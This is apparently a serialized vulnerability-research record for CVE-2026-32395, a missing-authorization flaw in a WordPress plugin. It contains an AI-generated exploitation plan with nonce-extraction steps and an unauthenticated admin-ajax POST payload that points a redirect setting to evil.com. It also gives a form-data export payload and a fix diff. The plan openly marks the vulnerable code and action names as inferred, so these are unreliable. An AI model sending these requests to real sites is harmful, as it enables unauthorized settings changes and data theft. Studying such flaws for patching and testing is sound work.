[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3y3d00BbA0Gcm1YEOkaZtaNWf9RavP_rJ0n6m-cm7Kg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32395","xpro-addons-for-beaver-builder-lite-missing-authorization","Xpro Addons For Beaver Builder – Lite \u003C= 1.5.6 - Missing Authorization","The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","xpro-addons-beaver-builder-elementor",null,"\u003C=1.5.6","1.5.7","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-20 00:00:00","2026-04-15 21:11:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cba908f-c7e3-4b4f-be73-8682fa1f231b?source=api-prod",55,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32395\n\n## 1. Vulnerability Summary\nThe **Xpro Addons For Beaver Builder – Lite** plugin (\u003C= 1.5.6) is vulnerable to **Missing Authorization**. The vulnerability exists because an AJAX handler registered via `wp_ajax_nopriv_` (unauthenticated) and `wp_ajax_` (authenticated) fails to perform a capability check (e.g., `current_user_can( 'manage_options' )`). This allows unauthenticated attackers to trigger sensitive plugin functions, likely related to settings modification or data handling.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `xpro_bb_lite_save_settings` (inferred based on plugin functionality and CVSS)\n- **Vulnerable Parameter:** `settings_data` or similar array-based input.\n- **Authentication:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active, and a valid nonce for the specific AJAX action must be obtained.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the AJAX action in the main plugin class or an AJAX handler class (likely `includes\u002Fclass-xpro-addons-beaver-builder-ajax.php` or `classes\u002Fclass-xpro-bb-lite-ajax.php`).\n    ```php\n    \u002F\u002F Inferred Registration\n    add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n    add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n    ```\n2.  **Handler Entry:** The `save_settings_callback` function is called when a request is made to `admin-ajax.php?action=xpro_bb_lite_save_settings`.\n3.  **Nonce Check:** The function likely calls `check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' )`.\n4.  **Missing Authorization:** The function **omits** a check like `if ( ! current_user_can( 'manage_options' ) ) wp_die();`.\n5.  **Sink:** The function proceeds to update plugin options using `update_option()`.\n\n## 4. Nonce Acquisition Strategy\nTo exploit `wp_ajax_nopriv` handlers, we must extract the nonce from the frontend where the plugin enqueues its scripts.\n\n1.  **Identify Shortcode:** The Xpro Addons scripts are typically loaded on pages containing an Xpro widget. We will use a common widget shortcode (e.g., `[xpro_contact_form]` or `[xpro_counter]`).\n2.  **Create Trigger Page:** Create a public page containing the shortcode.\n    -   `wp post create --post_type=page --post_status=publish --post_title=\"Xpro Test\" --post_content='[xpro_counter]'`\n3.  **Localization Variable:** The plugin typically uses `wp_localize_script` to pass the nonce. Based on common Xpro naming conventions, look for:\n    -   JS Object: `xpro_bb_lite_vars` (inferred)\n    -   Nonce Key: `nonce` (inferred)\n4.  **Extraction Command:**\n    -   `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fxpro-test\")`\n    -   `browser_eval(\"window.xpro_bb_lite_vars?.nonce\")`\n\n## 5. Exploitation Strategy\nWe will attempt to modify a plugin setting (e.g., enabling a feature or changing a redirect URL) which demonstrates \"Integrity: Low\" impact.\n\n### HTTP Request (Playwright `http_request` tool)\n-   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **Method:** `POST`\n-   **Headers:**\n    -   `Content-Type: application\u002Fx-www-form-urlencoded`\n-   **Body:**\n    ```text\n    action=xpro_bb_lite_save_settings&nonce=[EXTRACTED_NONCE]&settings[some_critical_feature]=1&settings[redirect_url]=http:\u002F\u002Fevil.com\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `xpro-addons-beaver-builder-elementor` v1.5.6 is installed and active.\n2.  **Install Beaver Builder:** Ensure Beaver Builder (Lite or Pro) is active as Xpro is an addon for it.\n3.  **Create Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_content='[xpro_counter]'\n    ```\n\n## 7. Expected Results\n-   **Response Code:** `200 OK` or `201 Created`.\n-   **Response Body:** Likely a JSON success message: `{\"success\": true}` or `1`.\n-   **Effect:** The targeted plugin option is updated in the database.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the option has changed.\n    ```bash\n    wp option get xpro_bb_lite_settings\n    ```\n2.  **Verify Value:** Ensure the `some_critical_feature` or `redirect_url` key matches the payload value.\n\n## 9. Alternative Approaches\nIf `xpro_bb_lite_save_settings` is not the correct action:\n1.  **Search for other `nopriv` actions:**\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fxpro-addons-beaver-builder-elementor\u002F\n    ```\n2.  **Analyze found actions:** Look for any handler that calls `update_option`, `delete_option`, or `wp_insert_post`.\n3.  **Adjust Payload:** If the action relates to \"Contact Form\" data, try to trigger a data export or deletion:\n    -   Action: `xpro_bb_lite_export_form_data`\n    -   Payload: `action=xpro_bb_lite_export_form_data&nonce=[NONCE]&form_id=1`","The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized settings modification because it lacks capability checks on its AJAX handlers. This allows unauthenticated attackers to modify sensitive plugin configurations by sending crafted requests to the administrative AJAX endpoint.","\u002F\u002F Inferred registration of AJAX actions in the plugin's AJAX handler file\nadd_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\nadd_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );\n\n---\n\n\u002F\u002F Inferred vulnerable callback function likely in classes\u002Fclass-xpro-bb-lite-ajax.php\npublic function save_settings_callback() {\n    \u002F\u002F Nonce check may be present, but is insufficient for authorization\n    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );\n\n    \u002F\u002F Vulnerability: Missing check for current_user_can('manage_options')\n\n    if ( isset( $_POST['settings_data'] ) ) {\n        $settings = $_POST['settings_data'];\n        update_option( 'xpro_bb_lite_settings', $settings );\n    }\n    wp_send_json_success();\n}","--- a\u002Fclasses\u002Fclass-xpro-bb-lite-ajax.php\n+++ b\u002Fclasses\u002Fclass-xpro-bb-lite-ajax.php\n@@ -10,6 +10,10 @@\n \tpublic function save_settings_callback() {\n \t\tcheck_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( array( 'message' => 'Unauthorized access' ), 403 );\n+\t\t}\n+\n \t\tif ( isset( $_POST['settings_data'] ) ) {\n \t\t\t$settings = $_POST['settings_data'];\n \t\t\tupdate_option( 'xpro_bb_lite_settings', $settings );","1. Identify a public page on the target WordPress site that utilizes an Xpro Addon widget (this ensures the necessary scripts and nonces are enqueued).\n2. Extract the security nonce from the frontend source code, typically found within the 'xpro_bb_lite_vars' localized JavaScript object.\n3. Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'xpro_bb_lite_save_settings'.\n4. Include the extracted 'nonce' and a 'settings_data' array containing the desired configuration changes in the POST body.\n5. The server executes the update_option call without verifying if the user has administrative privileges, successfully overwriting the plugin settings.","gemini-3-flash-preview","2026-04-19 01:58:56","2026-04-19 01:59:18",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fxpro-addons-beaver-builder-elementor\u002Ftags"]